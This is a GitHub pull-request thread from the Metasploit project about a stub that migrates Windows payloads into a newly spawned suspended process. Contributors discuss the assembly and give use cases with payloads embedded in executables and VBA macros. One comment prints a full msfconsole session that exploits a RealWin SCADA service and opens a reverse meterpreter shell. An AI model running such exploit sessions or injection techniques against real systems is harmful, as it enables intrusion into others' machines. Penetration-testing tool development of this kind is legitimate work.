Add migrate stub option to Windows x86 payloads. Spawns payload in new process. #909

Closed
wants to merge 1 commit into
from

Conversation

Projects
None yet
4 participants
@scriptjunkie
Contributor

scriptjunkie commented Oct 14, 2012

Based on http://dev.metasploit.com/redmine/issues/4943 by corelanc0d3r, with a number of notable changes:

  • Spawns new process suspended, so any executable can be used without dying or displaying windows
  • Does not delay, escaping unstable processes faster
  • Using sf/metasploit block_api standard shellcode base for easier maintenance and to avoid crashes
  • Integrated into Msf::Payload::Windows using advanced options so that it can be used with any payload (such as vba macros and exe injects)
  • Uses same techniques as Linux shellcode prepends for easier maintenance

I just tested it out on a number of attacks and was very happy - got lots of stable meterpreter sessions that were previously dying or not even connecting.

@wchen-r7

This comment has been minimized.

Show comment Hide comment
@wchen-r7

wchen-r7 Oct 14, 2012

Contributor

got lots of stable meterpreter sessions that were previously dying or not even connecting.

Which ones?

Contributor

wchen-r7 commented Oct 14, 2012

got lots of stable meterpreter sessions that were previously dying or not even connecting.

Which ones?

@scriptjunkie

This comment has been minimized.

Show comment Hide comment
@scriptjunkie

scriptjunkie Oct 14, 2012

Contributor

When adding a payload to an existing executable (-k option), if the executable finished running quickly (like many command-line utilities), the session would die before I could migrate out. Same story on in-memory vba payloads if someone closed Excel or Word before you migrate out.

Contributor

scriptjunkie commented Oct 14, 2012

When adding a payload to an existing executable (-k option), if the executable finished running quickly (like many command-line utilities), the session would die before I could migrate out. Same story on in-memory vba payloads if someone closed Excel or Word before you migrate out.

@wchen-r7

This comment has been minimized.

Show comment Hide comment
@wchen-r7

wchen-r7 Oct 15, 2012

Contributor

Ok, thanks. I'm also gonna try to bring in corelanc0d3r for testing.

Contributor

wchen-r7 commented Oct 15, 2012

Ok, thanks. I'm also gonna try to bring in corelanc0d3r for testing.

@corelanc0d3r

This comment has been minimized.

Show comment Hide comment
@corelanc0d3r

corelanc0d3r Oct 15, 2012

Contributor

will do some testing today, good work !!

Contributor

corelanc0d3r commented Oct 15, 2012

will do some testing today, good work !!

@corelanc0d3r

This comment has been minimized.

Show comment Hide comment
@corelanc0d3r

corelanc0d3r Oct 15, 2012

Contributor

btw - I have had a case (on a slower machine) where I had to delay & wait for the new process to fully run before injecting the payload - maybe we can set delay as an option (and set it to 0 by default, so it would omit the delay routine ?)

Contributor

corelanc0d3r commented Oct 15, 2012

btw - I have had a case (on a slower machine) where I had to delay & wait for the new process to fully run before injecting the payload - maybe we can set delay as an option (and set it to 0 by default, so it would omit the delay routine ?)

@corelanc0d3r

This comment has been minimized.

Show comment Hide comment
@corelanc0d3r

corelanc0d3r Oct 15, 2012

Contributor

was comparing the code with the last pull request I made regarding this code (df3058e)

In the WriteProcessMemory() routine, I simply pushed esp as the lpNumberOfBytesWritten argument. In your code, I see lea esi, [edi + 4] and push esi (which is slightly larger than push esp). Any particular reason for doing that ?

then on line 223 and 224, we get a pointer to the payload. There's no need to pop and push, because the pointer is already where it needs to be. (see my code at line 515 and 516)

Contributor

corelanc0d3r commented Oct 15, 2012

was comparing the code with the last pull request I made regarding this code (df3058e)

In the WriteProcessMemory() routine, I simply pushed esp as the lpNumberOfBytesWritten argument. In your code, I see lea esi, [edi + 4] and push esi (which is slightly larger than push esp). Any particular reason for doing that ?

then on line 223 and 224, we get a pointer to the payload. There's no need to pop and push, because the pointer is already where it needs to be. (see my code at line 515 and 516)

@corelanc0d3r

This comment has been minimized.

Show comment Hide comment
@corelanc0d3r

corelanc0d3r Oct 15, 2012

Contributor

I have removed the lea esi,[edi+4] / push esi with a simple push esp,
and removed the pop edi & push edx

result:

msf > use exploit/windows/scada/realwin_corelan 
msf  exploit(realwin_corelan) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(realwin_corelan) > set lhost 192.168.201.201
lhost => 192.168.201.201
msf  exploit(realwin_corelan) > set PrependMigrate true
PrependMigrate => true
msf  exploit(realwin_corelan) > set RHOST 192.168.201.205
RHOST => 192.168.201.205
msf  exploit(realwin_corelan) > exploit

[*] Started reverse handler on 192.168.201.201:4444 
[*] Trying target XP SP3...
[*] Sending stage (752128 bytes) to 192.168.201.205
[*] Meterpreter session 1 opened (192.168.201.201:4444 -> 192.168.201.205:4477) at Mon Oct 15 20:24:32 +0200 2012

meterpreter > shell
Process 3676 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\PROGRA~1\DATAC\Real.Win>

To me, the module is good to go (with the suggested changes).
If there ever is a need to add an optional delay after creating the suspended process, I guess it can still be added

thanks for picking this one up again :)

Contributor

corelanc0d3r commented Oct 15, 2012

I have removed the lea esi,[edi+4] / push esi with a simple push esp,
and removed the pop edi & push edx

result:

msf > use exploit/windows/scada/realwin_corelan 
msf  exploit(realwin_corelan) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(realwin_corelan) > set lhost 192.168.201.201
lhost => 192.168.201.201
msf  exploit(realwin_corelan) > set PrependMigrate true
PrependMigrate => true
msf  exploit(realwin_corelan) > set RHOST 192.168.201.205
RHOST => 192.168.201.205
msf  exploit(realwin_corelan) > exploit

[*] Started reverse handler on 192.168.201.201:4444 
[*] Trying target XP SP3...
[*] Sending stage (752128 bytes) to 192.168.201.205
[*] Meterpreter session 1 opened (192.168.201.201:4444 -> 192.168.201.205:4477) at Mon Oct 15 20:24:32 +0200 2012

meterpreter > shell
Process 3676 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\PROGRA~1\DATAC\Real.Win>

To me, the module is good to go (with the suggested changes).
If there ever is a need to add an optional delay after creating the suspended process, I guess it can still be added

thanks for picking this one up again :)

@corelanc0d3r

This comment has been minimized.

Show comment Hide comment
@corelanc0d3r

corelanc0d3r Oct 15, 2012

Contributor

if you feel like adding references or credits in the code - I used the technique before & described it here: https://www.corelan.be/index.php/2011/07/27/metasploit-bounty-the-good-the-bad-and-the-ugly/

(I guess we can now also update that iconics module, remove the hardcoded stub & replace it with a pre-defined, non-changeable PrependMigrate to true (or will users always be able to overrule that ?)

Contributor

corelanc0d3r commented Oct 15, 2012

if you feel like adding references or credits in the code - I used the technique before & described it here: https://www.corelan.be/index.php/2011/07/27/metasploit-bounty-the-good-the-bad-and-the-ugly/

(I guess we can now also update that iconics module, remove the hardcoded stub & replace it with a pre-defined, non-changeable PrependMigrate to true (or will users always be able to overrule that ?)

@jlee-r7

This comment has been minimized.

Show comment Hide comment
@jlee-r7

jlee-r7 Oct 15, 2012

Contributor

Please fix your commit message and re-request. See HACKING and http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html

Contributor

jlee-r7 commented Oct 15, 2012

Please fix your commit message and re-request. See HACKING and http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html

@jlee-r7 jlee-r7 closed this Oct 15, 2012

@scriptjunkie

This comment has been minimized.

Show comment Hide comment
@scriptjunkie

scriptjunkie Oct 15, 2012

Contributor

corelanc0d3r, I would think that crashes were caused by the api-finding code iterating over the module lists while DLLs are being loaded and those lists are being changed. Or maybe process-specific code could be changing something. Either way, I spawned the process suspended so that there should not be any other code running that could interfere with the shellcode. I had gotten crashes on a win7 64 VM before I made the changes but not after. Without any other active threads, I am not sure what would cause a crash, but if you think of something or still get crashes, let me know.

Contributor

scriptjunkie commented Oct 15, 2012

corelanc0d3r, I would think that crashes were caused by the api-finding code iterating over the module lists while DLLs are being loaded and those lists are being changed. Or maybe process-specific code could be changing something. Either way, I spawned the process suspended so that there should not be any other code running that could interfere with the shellcode. I had gotten crashes on a win7 64 VM before I made the changes but not after. Without any other active threads, I am not sure what would cause a crash, but if you think of something or still get crashes, let me know.

@scriptjunkie

This comment has been minimized.

Show comment Hide comment
@scriptjunkie

scriptjunkie Oct 15, 2012

Contributor

Also, you are right about the push esp and pop edx/push edx. I had removed the push ecx from the diff here http://dev.metasploit.com/redmine/issues/4943 and hadn't looked close enough to see the duplication. The lea esi... came from me thinking about using that address for something else, but doesn't make sense now. I'll recommit and re-pull request.

Contributor

scriptjunkie commented Oct 15, 2012

Also, you are right about the push esp and pop edx/push edx. I had removed the push ecx from the diff here http://dev.metasploit.com/redmine/issues/4943 and hadn't looked close enough to see the duplication. The lea esi... came from me thinking about using that address for something else, but doesn't make sense now. I'll recommit and re-pull request.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment